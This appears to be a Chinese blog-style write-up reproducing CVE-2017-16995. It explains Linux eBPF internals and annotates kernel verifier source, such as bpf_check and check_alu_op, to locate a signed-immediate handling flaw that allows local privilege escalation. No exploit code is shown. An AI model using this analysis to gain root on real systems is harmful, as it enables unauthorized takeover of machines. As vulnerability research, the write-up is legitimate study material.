CVE-2017-16995复现

对eBPF模块中由于s32到u64的符号扩展问题导致的漏洞CVE-2017-16995的复现。

CVE-2017-16995最初是由Google project zero披露,并公开了相关poc,在2017年12月23日,Bruce Leidl公布了提权代码。在2018年3月中旬,Vitaly Nikolenko在推特上发布消息说Ubuntu 16.04存在高危漏洞,可以进行本地提权,同时公布了exp。整个过程仅利用精心构造的数据就可以劫持控制流,是属于Data-Oriented Attacks在Linux kernel上的一个典型应用。

eBPF模块

eBPF源于成型于BSD上的技术BPF(Berkeley Packet Filter),BPF是一个用于过滤网络报文(Packet)的架构,常用的抓包软件tcpdump,wireshark都基于整个模块对用户提供抓包接口。BPF根据规则过滤报文,将符合条件的报文由内核空间复制到用户空间。eBPF是基于原有的BPF,重新设计了一个新的BPF模块,在Linux 3.17加入到kernel/bpf中,新的BPF被命名为extended BPF,简称eBPF。BPF提供了一个内核与用户进行代码和数据传输的桥梁,用户可以使用eBPF指令字节码的形式编写代码并传入内核,通过相关事件触发内核执行用户传入的代码。可以注入代码必然存在安全隐患,eBPF制定了复杂的verifier机制,在运行用户代码之前,先要进行一系列的安全检查,采用模拟执行的方式进行检查,最大程度的防止eBPF代码在真实执行时发生攻击。

eBPF sample

Linux内核代码的samples/bpf目录下有bpf的使用示例,以一个简答的sample来说明一个eBPF过滤代码的编写过程。因为后续调试内核版本是v4.4.110,所以源码版本是v4.4.110。示例代码如下,整个过程分为三部分。这里涉及到的bpf_create_map,bpf_prog_load都是samplesz中自定义的函数,仅在samples中调用,利用系统调用syscall(NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr))和syscall(NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr))实现,后面介绍的这两个函数是内核真正实现和运行的函数源码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
//https://elixir.bootlin.com/linux/v4.4.110/source/samples/bpf/sock_example.c
static int test_sock(void)
{
int sock = -1, map_fd, prog_fd, i, key;
long long value = 0, tcp_cnt, udp_cnt, icmp_cnt;

map_fd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(key), sizeof(value), 256); //创建map
if (map_fd < 0) {
printf("failed to create map '%s'\n", strerror(errno));
goto cleanup;
}

//编写的eBPF代码
struct bpf_insn prog[] = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_LD_ABS(BPF_B, ETH_HLEN + offsetof(struct iphdr, protocol) /* R0 = ip->proto */),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), /* *(u32 *)(fp - 4) = r0 */
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */
BPF_LD_MAP_FD(BPF_REG_1, map_fd),
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 2),
BPF_MOV64_IMM(BPF_REG_1, 1), /* r1 = 1 */
BPF_RAW_INSN(BPF_STX | BPF_XADD | BPF_DW, BPF_REG_0, BPF_REG_1, 0, 0), /* xadd r0 += r1 */
BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = 0 */
BPF_EXIT_INSN(),
};

//将eBPF代码加载至内核
prog_fd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog),
"GPL", 0);
if (prog_fd < 0) {
printf("failed to load prog '%s'\n", strerror(errno));
goto cleanup;
}

sock = open_raw_sock("lo");

//将用户自定义的eBPF代码绑定到指定的sockert上
if (setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd,
sizeof(prog_fd)) < 0) {
printf("setsockopt %s\n", strerror(errno));
goto cleanup;
}

//执行eBPF代码,过滤socket数据包,此时为真实执行
for (i = 0; i < 10; i++) {
key = IPPROTO_TCP;
assert(bpf_lookup_elem(map_fd, &key, &tcp_cnt) == 0);

key = IPPROTO_UDP;
assert(bpf_lookup_elem(map_fd, &key, &udp_cnt) == 0);

key = IPPROTO_ICMP;
assert(bpf_lookup_elem(map_fd, &key, &icmp_cnt) == 0);

printf("TCP %lld UDP %lld ICMP %lld packets\n",
tcp_cnt, udp_cnt, icmp_cnt);
sleep(1);
}

cleanup:
/* maps, programs, raw sockets will auto cleanup on process exit */
return 0;
}

1.首先调用bpf_create_map创建一个map,在attr结构体中指定map的类型、key和value的大小、最大容量,函数返回一个map_fd描述符。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
//https://elixir.bootlin.com/linux/v4.4.110/source/samples/bpf/libbpf.c#L21
int bpf_create_map(enum bpf_map_type map_type, int key_size,
int value_size, int max_entries)
{
union bpf_attr attr;

memset(&attr, '\0', sizeof(attr));

attr.map_type = map_type;
attr.key_size = key_size;
attr.value_size = value_size;
attr.max_entries = max_entries;

return sys_bpf(BPF_MAP_CREATE, &attr, sizeof(attr));
}

2.调用bpf_prog_load将用户编写的eBPF代码prog加载至内核,attr结构体包含了指令的类型,指令首地址,指令长度,日志大小,日志级别等,然后会进行一系列检查,检查核心在于bpf_check函数,采用模拟执行的方式进行检查。这个下文中会有分析。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/syscall.c#L621
static int bpf_prog_load(union bpf_attr *attr)
{
enum bpf_prog_type type = attr->prog_type;
struct bpf_prog *prog;
int err;
char license[128];
bool is_gpl;

//对传入的attr结构体进行检查,主要检查各个成员的大小
if (CHECK_ATTR(BPF_PROG_LOAD))
return -EINVAL;

/* copy eBPF program license from user space */
//从用户空间获取eBPF程序证书
if (strncpy_from_user(license, u64_to_ptr(attr->license),
sizeof(license) - 1) < 0)
return -EFAULT;
license[sizeof(license) - 1] = 0;

/* eBPF programs must be GPL compatible to use GPL-ed functions */
//规定eBPF程序必须与GPL兼容
is_gpl = license_is_gpl_compatible(license);

//检查指令条数是否超过BPF_MAXINSNS,BPF_MAXINSNS定义为4096
if (attr->insn_cnt >= BPF_MAXINSNS)
return -EINVAL;

//检查指令类型以及程序指定的内核版本
if (type == BPF_PROG_TYPE_KPROBE &&
attr->kern_version != LINUX_VERSION_CODE)
return -EINVAL;

if (type != BPF_PROG_TYPE_SOCKET_FILTER && !capable(CAP_SYS_ADMIN))
return -EPERM;

/* plain bpf_prog allocation */
//创建buf_prog结构体,用于存储用户定义的eBPF指令以及相关参数
prog = bpf_prog_alloc(bpf_prog_size(attr->insn_cnt), GFP_USER);
if (!prog)
return -ENOMEM;


err = bpf_prog_charge_memlock(prog);
if (err)
goto free_prog_nouncharge;

prog->len = attr->insn_cnt;

err = -EFAULT;
//将eBPF指令拷贝至prog结构体指向的内存中
if (copy_from_user(prog->insns, u64_to_ptr(attr->insns),
prog->len * sizeof(struct bpf_insn)) != 0)
goto free_prog;

prog->orig_prog = NULL;
prog->jited = 0;

atomic_set(&prog->aux->refcnt, 1);
prog->gpl_compatible = is_gpl ? 1 : 0;

/* find program type: socket_filter vs tracing_filter */
//判断过滤程序的过滤模式,是socket_filter(socket数据包过滤)还是tracing_filter(系统调用号及参数过滤)
err = find_prog_type(type, prog);
if (err < 0)
goto free_prog;

/* run eBPF verifier */
//执行eBPF的verifier机制
err = bpf_check(&prog, attr);
if (err < 0)
goto free_used_maps;

/* fixup BPF_CALL->imm field */
//修正eBPF指令中call和跳转令的操作数范围
fixup_bpf_calls(prog);

/* eBPF program is ready to be JITed */
//JIT加载
err = bpf_prog_select_runtime(prog);
if (err < 0)
goto free_used_maps;

err = bpf_prog_new_fd(prog);
if (err < 0)
/* failed to allocate fd */
goto free_used_maps;

return err;

free_used_maps:
free_used_maps(prog->aux);
free_prog:
bpf_prog_uncharge_memlock(prog);
free_prog_nouncharge:
bpf_prog_free(prog);
return err;
}

3.用户调用setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0)将用户自定义的eBPF代码绑定到指定的socket上,此时代码已经拷贝至内核,由prog_fd指向bpf_prog的结构体维护。成功绑定后,对socket数据包执行eBPF代码,此时为真实执行。

eBPF指令集

eBPF指令集与我们常见的汇编指令有所不同,它拥有R0~R10共11个虚拟寄存器,它有一个栈,使用map结构与用户进行交互,前文中也提到调用bpf_create_map创建一个map。在64位下,R0~R10与CPU中的10个物理寄存器对应如下:

1
2
3
4
5
6
7
8
9
10
11
R0 -- RAX
R1 -- RDI
R2 -- RSI
R3 -- RDX
R4 -- RCX
R5 -- R8
R6 -- RBX
R7 -- R13
R8 -- R14
R9 -- R15
R10 -- RBP

每条指令对应的数据结构如下,在示例中prog的类型就是struct bpf_insn:

1
2
3
4
5
6
7
8
https://elixir.bootlin.com/linux/v4.4.110/source/include/uapi/linux/bpf.h#L58
struct bpf_insn {
__u8 code; /* opcode */ //操作码
__u8 dst_reg:4; /* dest register */ //目标寄存器
__u8 src_reg:4; /* source register */ //源寄存器
__s16 off; /* signed offset */ //指令偏移
__s32 imm; /* signed immediate constant */ //立即数
};

eBPF的操作码一共有8大类,一个code有8个bit,code的低三位代表了指令的类型:

1
2
3
4
5
6
7
8
9
10
11
https://elixir.bootlin.com/linux/v4.4.110/source/include/uapi/linux/bpf_common.h#L6
/* Instruction classes */
#define BPF_CLASS(code) ((code) & 0x07)
#define BPF_LD 0x00
#define BPF_LDX 0x01 //load指令
#define BPF_ST 0x02
#define BPF_STX 0x03 //store指令
#define BPF_ALU 0x04 //计算指令
#define BPF_JMP 0x05 //跳转指令
#define BPF_RET 0x06 //返回指令
#define BPF_MISC 0x07 //其他指令

eBPF verifier机制

检查机制核心在于bpf_check函数,一共有两次check,首轮检查的关键函数是check_cfg,对代码进行有向无环图检测,检查代码中是否有循环,以及跳转指令是否跳转到未知位置,第二轮检查由do_check实现。在进行两轮check之前,先执行了replace_map_fd_with_map_ptr函数,首先看一下这个函数,然后再看一下模拟执行的检查。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/verifier.c#L2214
int bpf_check(struct bpf_prog **prog, union bpf_attr *attr)
{
char __user *log_ubuf = NULL;
struct verifier_env *env;
int ret = -EINVAL;

//首先检查指令的size,是否小于0或超过BPF_MAXINSNS(4096)
if ((*prog)->len <= 0 || (*prog)->len > BPF_MAXINSNS)
return -E2BIG;

/* 'struct verifier_env' can be global, but since it's not small,
* allocate/free it every time bpf_check() is called
*/
env = kzalloc(sizeof(struct verifier_env), GFP_KERNEL);
if (!env)
return -ENOMEM;

env->prog = *prog;

/* grab the mutex to protect few globals used by verifier */
mutex_lock(&bpf_verifier_lock);

//获取与log有关的参数,在attr结构体中保存了指令类型,指令大小以及log相关参数
if (attr->log_level || attr->log_buf || attr->log_size) {
/* user requested verbose verifier output
* and supplied buffer to store the verification trace
*/
log_level = attr->log_level;
log_ubuf = (char __user *) (unsigned long) attr->log_buf;
log_size = attr->log_size;
log_len = 0;

ret = -EINVAL;
/* log_* values have to be sane */
if (log_size < 128 || log_size > UINT_MAX >> 8 ||
log_level == 0 || log_ubuf == NULL)
goto free_env;

ret = -ENOMEM;
log_buf = vmalloc(log_size);
if (!log_buf)
goto free_env;
} else {
log_level = 0;
}


ret = replace_map_fd_with_map_ptr(env); //here
if (ret < 0)
goto skip_full_check;

env->explored_states = kcalloc(env->prog->len,
sizeof(struct verifier_state_list *),
GFP_USER);
ret = -ENOMEM;
if (!env->explored_states)
goto skip_full_check;

//首轮检查,检查是否有循环存在,以及跳转到未知地址
ret = check_cfg(env);
if (ret < 0)
goto skip_full_check;

env->allow_ptr_leaks = capable(CAP_SYS_ADMIN);

//二轮检查,模拟执行的方式,非常细致
ret = do_check(env);

skip_full_check:
while (pop_stack(env, NULL) >= 0);
free_states(env);

if (ret == 0)
/* program is valid, convert *(u32*)(ctx + off) accesses */
ret = convert_ctx_accesses(env);

if (log_level && log_len >= log_size - 1) {
BUG_ON(log_len >= log_size);
/* verifier log exceeded user supplied buffer */
ret = -ENOSPC;
/* fall through to return what was recorded */
}

/* copy verifier log back to user space including trailing zero */
if (log_level && copy_to_user(log_ubuf, log_buf, log_len + 1) != 0) {
ret = -EFAULT;
goto free_log_buf;
}

if (ret == 0 && env->used_map_cnt) {
/* if program passed verifier, update used_maps in bpf_prog_info */
env->prog->aux->used_maps = kmalloc_array(env->used_map_cnt,
sizeof(env->used_maps[0]),
GFP_KERNEL);

if (!env->prog->aux->used_maps) {
ret = -ENOMEM;
goto free_log_buf;
}

memcpy(env->prog->aux->used_maps, env->used_maps,
sizeof(env->used_maps[0]) * env->used_map_cnt);
env->prog->aux->used_map_cnt = env->used_map_cnt;

/* program is valid. Convert pseudo bpf_ld_imm64 into generic
* bpf_ld_imm64 instructions
*/
convert_pseudo_ld_imm64(env);
}

free_log_buf:
if (log_level)
vfree(log_buf);
free_env:
if (!env->prog->aux->used_maps)
/* if we didn't copy map pointers into bpf_prog_info, release
* them now. Otherwise free_bpf_prog_info() will release them.
*/
release_maps(env);
*prog = env->prog;
kfree(env);
mutex_unlock(&bpf_verifier_lock);
return ret;
}

replace_map_fd_with_map_ptr

当指令类型为BPF_LD | BPF_IMM | BPF_DW且源寄存器值为1且下一条指令为全0时,该函数会对这条指令以及它的下一条指令进行imm替换,首先根据指令的imm获取bpf_map的fd,根据fd获取bpf_map的地址,然后将该指令的imm替换为map的地址的低32位,高32位赋值给下一条指令的imm。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/verifier.c#L1990
static int replace_map_fd_with_map_ptr(struct verifier_env *env)
{
struct bpf_insn *insn = env->prog->insnsi;
int insn_cnt = env->prog->len;
int i, j;

//对eBPF指令进行遍历
for (i = 0; i < insn_cnt; i++, insn++) {
if (BPF_CLASS(insn->code) == BPF_LDX &&
(BPF_MODE(insn->code) != BPF_MEM || insn->imm != 0)) {
verbose("BPF_LDX uses reserved fields\n");
return -EINVAL;
}

if (BPF_CLASS(insn->code) == BPF_STX &&
((BPF_MODE(insn->code) != BPF_MEM &&
BPF_MODE(insn->code) != BPF_XADD) || insn->imm != 0)) {
verbose("BPF_STX uses reserved fields\n");
return -EINVAL;
}

//指令类型为BPF_LD | BPF_IMM | BPF_DW
if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
struct bpf_map *map;
struct fd f;
//它的下一条指令必须为"\x00\x00\x00\x00\x00\x00\x00\x00"
if (i == insn_cnt - 1 || insn[1].code != 0 ||
insn[1].dst_reg != 0 || insn[1].src_reg != 0 ||
insn[1].off != 0) {
verbose("invalid bpf_ld_imm64 insn\n");
return -EINVAL;
}

if (insn->src_reg == 0)
/* valid generic load 64-bit imm */
goto next_insn;

//insn->src_reg必须等于BPF_PSEUDO_MAP_FD,BPF_PSEUDO_MAP_FD值为1
if (insn->src_reg != BPF_PSEUDO_MAP_FD) {
verbose("unrecognized bpf_ld_imm64 insn\n");
return -EINVAL;
}

f = fdget(insn->imm); //立即数为fd
map = __bpf_map_get(f); //根据fd获取结构体bpf_map地址
if (IS_ERR(map)) {
verbose("fd %d is not pointing to valid bpf_map\n",
insn->imm);
return PTR_ERR(map);
}

/* store map pointer inside BPF_LD_IMM64 instruction */
insn[0].imm = (u32) (unsigned long) map; //第一条指令的立即数中存储map地址的低32位
insn[1].imm = ((u64) (unsigned long) map) >> 32; //下一条指令的立即数中存储map地址的高32位

/* check whether we recorded this map already */
for (j = 0; j < env->used_map_cnt; j++)
if (env->used_maps[j] == map) {
fdput(f);
goto next_insn;
}

if (env->used_map_cnt >= MAX_USED_MAPS) {
fdput(f);
return -E2BIG;
}

/* hold the map. If the program is rejected by verifier,
* the map will be released by release_maps() or it
* will be used by the valid program until it's unloaded
* and all maps are released in free_bpf_prog_info()
*/
map = bpf_map_inc(map, false);
if (IS_ERR(map)) {
fdput(f);
return PTR_ERR(map);
}
env->used_maps[env->used_map_cnt++] = map;

fdput(f);
next_insn:
insn++;
i++;
}
}

/* now all pseudo BPF_LD_IMM64 instructions load valid
* 'struct bpf_map *' into a register instead of user map_fd.
* These pointers will be used later by verifier to validate map access.
*/
return 0;
}

关于检查机制,这里主要看一下与漏洞相关的do_check的检查逻辑。

do_check

寄存器初始化

首先初始化寄存器的状态,寄存器状态由结构体reg_state定义,它由一个枚举和联合类型组成,buf_reg_type定义了寄存器中存储的值的类型,包括初始化、指针、常量等。imm只有在操作数类型是立即数时才有用,此时寄存器类型为CONST_IMM或PTR_TO_STACK。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/verifier.c#L129
struct reg_state {
enum bpf_reg_type type;
union {
/* valid when type == CONST_IMM | PTR_TO_STACK */
int imm; //注意类型是int

/* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
* PTR_TO_MAP_VALUE_OR_NULL
*/
struct bpf_map *map_ptr;
};
};

enum bpf_reg_type {
NOT_INIT = 0, /* nothing was written into register */
UNKNOWN_VALUE, /* reg doesn't contain a valid pointer */
PTR_TO_CTX, /* reg points to bpf_context */
CONST_PTR_TO_MAP, /* reg points to struct bpf_map */
PTR_TO_MAP_VALUE, /* reg points to map element value */
PTR_TO_MAP_VALUE_OR_NULL,/* points to map elem value or NULL */
FRAME_PTR, /* reg == frame_pointer */
PTR_TO_STACK, /* reg == frame_pointer + imm */
CONST_IMM, /* constant integer value */
};

init_reg_state函数初始化寄存器的状态,将所有寄存器的类型初始化为NOT_INIT,R10的type初始化为栈指针,R1类型初始化为指向buf_context的指针。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/verifier.c#L474
static void init_reg_state(struct reg_state *regs)
{
int i;


for (i = 0; i < MAX_BPF_REG; i++) {
regs[i].type = NOT_INIT;
regs[i].imm = 0;
regs[i].map_ptr = NULL;
}

/* frame pointer */
regs[BPF_REG_FP].type = FRAME_PTR;

/* 1st arg to a function */
regs[BPF_REG_1].type = PTR_TO_CTX;
}

指令都存储在insns数组中,根据下标insn_idx的数值来获取每一条指令,检查的核心在for定义的无限循环中,insn_processed记录for循环执行的次数,最多执行32768次。首先获取指令的类型class,前面提到有8大类型,根据不同的指令类型有不同的处理方式。由于代码比较长,这里只关注与本漏洞相关的指令类型中的检查逻辑。首先看这几个check中用到的函数。

检查中的常用函数

check_reg_arg

首先是当寄存器作为操作数时,对寄存器进行检查的check_reg_arg函数,根据寄存器在指令中所处的位置(源操作数/目的操作数)分别对其type进行检查,当为读指令时,检查源操作数是否为可读;指令为写指令时,检查目的操作数是否可写。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/verifier.c#L505
static int check_reg_arg(struct reg_state *regs, u32 regno,
enum reg_arg_type t)
{
//检查是否超过R10的未定义寄存器
if (regno >= MAX_BPF_REG) {
verbose("R%d is invalid\n", regno);
return -EINVAL;
}

//寄存器作为源操作数,检查寄存器是否为可读状态(类型为指针或具体数值),但不能是未初始化
if (t == SRC_OP) {
/* check whether register used as source operand can be read */
if (regs[regno].type == NOT_INIT) {
verbose("R%d !read_ok\n", regno);
return -EACCES;
}
}

//寄存器作为目的操作数,检查寄存器是否为可写状态(栈指针只读),并修改寄存器类型
else {
/* check whether register used as dest operand can be written to */
if (regno == BPF_REG_FP) {
verbose("frame pointer is read only\n");
return -EACCES;
}
if (t == DST_OP)
mark_reg_unknown_value(regs, regno); //将寄存器类型修改为UNKNOWN_VALUE,map_ptr指针置空
}
return 0;
}

check_mem_access

regno是源寄存器,t是指令类型read/write,value_regno是目的寄存器,当指令对memory进行读写操作时,根据源寄存器类型分别进行不同的检查,中心思想是off不能超过memory的size范围,即不能溢出。当指令为写指令时,目的寄存器类型不能是常数或未知值;当指令为读指令时,目的寄存器类型置为UNKNOWN_VALUE。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/verifier.c#L683
static int check_mem_access(struct verifier_env *env, u32 regno, int off,
int bpf_size, enum bpf_access_type t,
int value_regno)
{
struct verifier_state *state = &env->cur_state;
int size, err = 0;

//源寄存器指向栈时,reg == frame_pointer + imm
if (state->regs[regno].type == PTR_TO_STACK)
off += state->regs[regno].imm;

size = bpf_size_to_bytes(bpf_size);
if (size < 0)
return size;

//判断访问的偏移off是否与buf的size对齐
if (off % size != 0) {
verbose("misaligned access off %d size %d\n", off, size);
return -EACCES;
}

//源寄存器指向结构体buf_map,根据指令类型t分别处理
if (state->regs[regno].type == PTR_TO_MAP_VALUE) {
//对bpf_map进行写操作,目的寄存器不能是常量或未知值
if (t == BPF_WRITE && value_regno >= 0 &&
is_pointer_value(env, value_regno)) {
verbose("R%d leaks addr into map\n", value_regno);
return -EACCES;
}
err = check_map_access(env, regno, off, size); //off不能超过buf_map的size范围
if (!err && t == BPF_READ && value_regno >= 0)
mark_reg_unknown_value(state->regs, value_regno);

}

//源寄存器指向bpf_context
else if (state->regs[regno].type == PTR_TO_CTX) {
//对bpf_context进行写操作,目的寄存器不能是常量或未知值
if (t == BPF_WRITE && value_regno >= 0 &&
is_pointer_value(env, value_regno)) {
verbose("R%d leaks addr into ctx\n", value_regno);
return -EACCES;
}
err = check_ctx_access(env, off, size, t);
if (!err && t == BPF_READ && value_regno >= 0)
mark_reg_unknown_value(state->regs, value_regno);

}

//源寄存器指向栈,检查地址偏移off的范围,指令类型为写指令时检查溢出,并检查读写操作时off是否超过size的范围
else if (state->regs[regno].type == FRAME_PTR ||
state->regs[regno].type == PTR_TO_STACK) {
if (off >= 0 || off < -MAX_BPF_STACK) {
verbose("invalid stack off=%d size=%d\n", off, size);
return -EACCES;
}
if (t == BPF_WRITE) {
if (!env->allow_ptr_leaks &&
state->stack_slot_type[MAX_BPF_STACK + off] == STACK_SPILL &&
size != BPF_REG_SIZE) {
verbose("attempt to corrupt spilled pointer on stack\n");
return -EACCES;
}
err = check_stack_write(state, off, size, value_regno);
} else {
err = check_stack_read(state, off, size, value_regno);
}
} else {
verbose("R%d invalid mem access '%s'\n",
regno, reg_type_str[state->regs[regno].type]);
return -EACCES;
}
return err;
}

在for循环中对于每一类指令几乎都用到check_reg_arg函数,对内存读写指令会调用check_mem_access函数进行检查。

BPF_ALU中的BPF_MOV

for循环中首先检查类型为BPF_ALU中的指令,我们常用的MOV指令在此类指令中,类型为BPF_MOV,当指令为BPF_ALU时,调用check_alu_op函数进行检查,check_alu_op函数会根据指令的小类型比如BPF_MOV,BPF_ADD等类型分别进行处理,这里关注小类型为BPF_MOV的情况,函数会调用check_reg_arg对源操作数和目的操作数进行检查,如果源操作数是寄存器时,会直接将源寄存器的reg_state复制到目的寄存器中;如果源操作数是立即数,会将insn->imm复制到目的寄存器的imm中,insn->imm和reg_state的imm类型都是int类型,然后目的寄存器的类型设置为CONST_IMM.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
* check validity of 32-bit and 64-bit arithmetic operations */
static int check_alu_op(struct verifier_env *env, struct bpf_insn *insn)
{
struct reg_state *regs = env->cur_state.regs;
u8 opcode = BPF_OP(insn->code);
int err;

if (opcode == BPF_END || opcode == BPF_NEG) {
... ...

} else if (opcode == BPF_MOV) {

if (BPF_SRC(insn->code) == BPF_X) {
if (insn->imm != 0 || insn->off != 0) {
verbose("BPF_MOV uses reserved fields\n");
return -EINVAL;
}

/* check src operand */
err = check_reg_arg(regs, insn->src_reg, SRC_OP);
if (err)
return err;
} else {
if (insn->src_reg != BPF_REG_0 || insn->off != 0) {
verbose("BPF_MOV uses reserved fields\n");
return -EINVAL;
}
}

/* check dest operand */
err = check_reg_arg(regs, insn->dst_reg, DST_OP);
if (err)
return err;

//源操作数是寄存器时,将源寄存器的reg_state复制到目的寄存器中
if (BPF_SRC(insn->code) == BPF_X) {
if (BPF_CLASS(insn->code) == BPF_ALU64) {
/* case: R1 = R2
* copy register state to dest reg
*/
regs[insn->dst_reg] = regs[insn->src_reg];
} else {
if (is_pointer_value(env, insn->src_reg)) {
verbose("R%d partial copy of pointer\n",
insn->src_reg);
return -EACCES;
}
regs[insn->dst_reg].type = UNKNOWN_VALUE;
regs[insn->dst_reg].map_ptr = NULL;
}
} else { //源操作数是立即数,将源操作数的数值复制到目的寄存器中,且目的寄存器类型设置为CONST_IMM
/* case: R = imm
* remember the value we stored into this reg
*/
regs[insn->dst_reg].type = CONST_IMM;
regs[insn->dst_reg].imm = insn->imm; //int类型
}

} else if (opcode > BPF_END) {
verbose("invalid BPF_ALU opcode %x\n", opcode);
return -EINVAL;

} else { /* all other ALU ops: and, sub, xor, add, ... */

... ...
}

return 0;
}

BPF_JMP

如果指令为BPF_JMP类型,do_check函数将跳转指令分为四类情况,第一类是函数调用BPF_CALL指令,第二类是BPF_JA指令,第三类是退出指令BPF_EXIT,第四类是其他跳转指令。第四类跳转指令将进入函数check_cond_jmp_op进行检查。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/verifier.c#L1893
} else if (class == BPF_JMP) {
u8 opcode = BPF_OP(insn->code);

if (opcode == BPF_CALL) {
if (BPF_SRC(insn->code) != BPF_K ||
insn->off != 0 ||
insn->src_reg != BPF_REG_0 ||
insn->dst_reg != BPF_REG_0) {
verbose("BPF_CALL uses reserved fields\n");
return -EINVAL;
}

err = check_call(env, insn->imm);
if (err)
return err;

} else if (opcode == BPF_JA) {
if (BPF_SRC(insn->code) != BPF_K ||
insn->imm != 0 ||
insn->src_reg != BPF_REG_0 ||
insn->dst_reg != BPF_REG_0) {
verbose("BPF_JA uses reserved fields\n");
return -EINVAL;
}

insn_idx += insn->off + 1;
continue;

} else if (opcode == BPF_EXIT) {
if (BPF_SRC(insn->code) != BPF_K ||
insn->imm != 0 ||
insn->src_reg != BPF_REG_0 ||
insn->dst_reg != BPF_REG_0) {
verbose("BPF_EXIT uses reserved fields\n");
return -EINVAL;
}

/* eBPF calling convetion is such that R0 is used
* to return the value from eBPF program.
* Make sure that it's readable at this time
* of bpf_exit, which means that program wrote
* something into it earlier
*/
err = check_reg_arg(regs, BPF_REG_0, SRC_OP);
if (err)
return err;

if (is_pointer_value(env, BPF_REG_0)) {
verbose("R0 leaks addr as return value\n");
return -EACCES;
}

process_bpf_exit:
insn_idx = pop_stack(env, &prev_insn_idx);
if (insn_idx < 0) {
break;
} else {
do_print_state = true;
continue;
}
} else {
err = check_cond_jmp_op(env, insn, &insn_idx);
if (err)
return err;
}
}

第四类跳转执行check_cond_jmp_op中的检查逻辑。这个函数主要关注条件跳转中目的寄存器是立即数的情况。当跳转指令类型是BPF_JEQ或BPF_JNE跳转时,会检查目的寄存器是否为立即数,如果是立即数,会检查当前指令的imm与目的寄存器的imm是否相等,如果两个imm相等恒成立,就是确定性跳转,就直接跳转到pc+off继续执行。如果不是确定性跳转,则说明跳转的两个分支都有可能执行,这里将不符合跳转条件的分支记作分支A,符合跳转条件的分支记作分支B,函数会继续检查分支A,直至遇到BPF_EXIT指令,并将分支B(insn_idx + insn->off + 1)压入一个临时栈中。这里注意到两个imm的类型,目的寄存器类型是reg_state,成员imm的类型是int有符号整数,指令类型是_s32,是有符号整数,两个均为有符号整数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
